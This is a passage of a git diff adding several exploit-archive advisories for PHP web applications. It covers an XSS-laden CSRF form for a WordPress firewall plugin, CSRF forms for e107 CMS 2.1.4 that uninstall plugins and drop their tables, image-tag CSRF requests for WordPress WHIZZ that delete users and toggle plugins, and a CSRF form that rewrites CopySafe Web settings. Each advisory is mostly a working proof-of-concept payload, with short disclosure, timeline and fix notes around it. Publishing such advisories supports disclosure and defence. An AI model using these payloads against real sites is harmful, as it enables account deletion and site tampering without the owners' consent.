+<form method=\"POST\" action=\"http://localhost/wp-admin/options-general.php?page=wordpress-firewall-2%2Fwordpress-firewall-2.php\">
+  <input type=\"text\" name=\"email_address\" value=\""><script>alert(1)</script>\">
+  <input type=\"text\" name=\"set_email\" value=\"Set Email\">
+  <input type=\"submit\">
+</form>
+
+<!--
+In a real attack, forms can be submitted automatically and spear-phishing attacks can be convincing.
+
+Mitigations
+================
+Disable the plugin until a new version is released that fixes this bug.
+
+Disclosure policy
+================
+dxw believes in responsible disclosure. Your attention is drawn to our disclosure policy: https://security.dxw.com/disclosure/
+
+Please contact us on security@dxw.com to acknowledge this report if you received it via a third party (for example, plugins@wordpress.org) as they generally cannot communicate with us on your behalf.
+
+This vulnerability will be published if we do not receive a response to this report with 14 days.
+
+Timeline
+================
+
+2016-12-23: Discovered
+2017-03-16: Reported to vendor by email
+2017-04-04: Vendor could not be contacted
+
+
+
+Discovered by dxw:
+================
+Tom Adams
+Please visit security.dxw.com for more information.
+-->
\ No newline at end of file
diff --git a/platforms/php/webapps/41844.html b/platforms/php/webapps/41844.html
new file mode 100755
index 000000000..d2dbdaed7
--- /dev/null
+++ b/platforms/php/webapps/41844.html
@@ -0,0 +1,51 @@
+<!--
+==========================
+Title:Mutiple CSRF vulnerabilities in e107 CMS 2.1.4
+Author:Zhiyang Zeng
+
+Product:
+—————
+e107 is a powerful website content management system designed for bootstrap v3 from http://e107.org/get-started
+—————
+
+Fix
+—————
+Fixed in git source code https://github.com/e107inc/e107/commit/7a3e3d9fc7e05ce6941b9af1c14010bf2141f1a5
+—————
+
+Summary
+————
+e107 CMS version 2.1.4 is vulnerable to cross-site request forgery in plugin-installing,meta-changingand settings-changing,a malicious web page can use
+forged requests to make e107 download and install a plug-in provided by the attacker.
+————
+
+Timeline
+———
+2017-03-01   report to vendor
+2017-03-02  GitHub commit to fix token missing
+———
+
+ Reproduce:
+==========
+I just give a uninstall any plugins POC.
+
+vul address:http://127.0.0.1/e107_2.1.4_full/e107_admin/plugin.php
+
+POC:
+-->
+
+<form action="http://127.0.0.1/e107_2.1.4_full/e107_admin/plugin.php?uninstall.8" method="post">
+<input type="text" name="delete_tables" value="1">
+<input type="text" name="delete_ipool" value="1">
+<input type="text" name="delete_files" value="0">
+<input type="text" name="uninstall_confirm" value="Confirm uninstall">
+<input type="submit" name="submit">
+</form>
+
+<!--
+Description:
+I try to uninstall plugin  gallery which id is 8.
+
+visiting beyond POC page, you will find gallery plugin has been uninstalled success!
+===========
+-->
\ No newline at end of file
diff --git a/platforms/php/webapps/41845.txt b/platforms/php/webapps/41845.txt
new file mode 100755
index 000000000..e0580b216
--- /dev/null
+++ b/platforms/php/webapps/41845.txt
@@ -0,0 +1,34 @@
+======
+Software: WordPress WHIZZ
+Version: <1.1.1
+Homepage: https://wordpress.org/plugins/whizz/
+=======
+
+Description
+================
+Get type CSRF in WordPress WHIZZ allows attackers to delete any wordpress users and change plugins status
+
+POC:
+========
+include in the page ,then attack will occur:
+
+delete user:
+
+<img src="http://127.0.0.1/wordpress/wp-admin/admin.php?page=users-list&uid=4&view=list_view&deletec=yes&list_of=all_users">
+
+
+active or disactive plugins:
+
+<img src="http://127.0.0.1/wordpress/wp-admin/admin.php?page=plugin-list&action=activatep&ppath=ag-custom-admin/plugin.php&view=list_view&list_of=">
+
+<img src="http://127.0.0.1/wordpress/wp-admin/admin.php?page=plugin-list&action=deactivatep&ppath=ag-custom-admin/plugin.php&view=list_view&list_of=">
+
+
+Mitigations
+================
+Disable the plugin until a new version is released that fixes this bug.
+
+
+FIX:
+==========
+https://wordpress.org/plugins/whizz/ 1.1.1 changelog->Specifically
\ No newline at end of file
diff --git a/platforms/php/webapps/41846.html b/platforms/php/webapps/41846.html
new file mode 100755
index 000000000..d07a1f5f6
--- /dev/null
+++ b/platforms/php/webapps/41846.html
@@ -0,0 +1,40 @@
+<!--
+=======
+Software: CopySafe Web
+version: <2.6
+description: Add copy protection from PrintScreen and screen capture. Copysafe Web uses encrypted images and domain lock to extend copy protection for all media displayed on a web page.
+========
+
+Description
+==========
+CSRF in wordpress copysafe web allows attacker changes plugin settings
+
+========
+
+POC:
+=======
+-->
+
+<form method="POST" action="http://127.0.0.1/wordpress/wp-admin/admin.php?page=wpcsw_settings">
+
+  <input type="text" name= "admin_only" value="checked">
+
+ <input type="text" name="asps" value="">
+ <input type="text" name="upload_path" value="">
+ <input type="text" name="max_size" value="">
+ <input type="text" name="mode" value=“checked”>
+ <input type=“text” name="submit” value="Save Settings”>
+   <input type="submit”>
+</form>
+
+<!--
+
+=========
+Mitigations
+================
+Disable the plugin until a new version is released that fixes this bug.
+
+Fixed
+=========
+https://wordpress.org/plugins/wp-copysafe-web/ changelog ->2.6 realease
+-->
\ No newline at end of file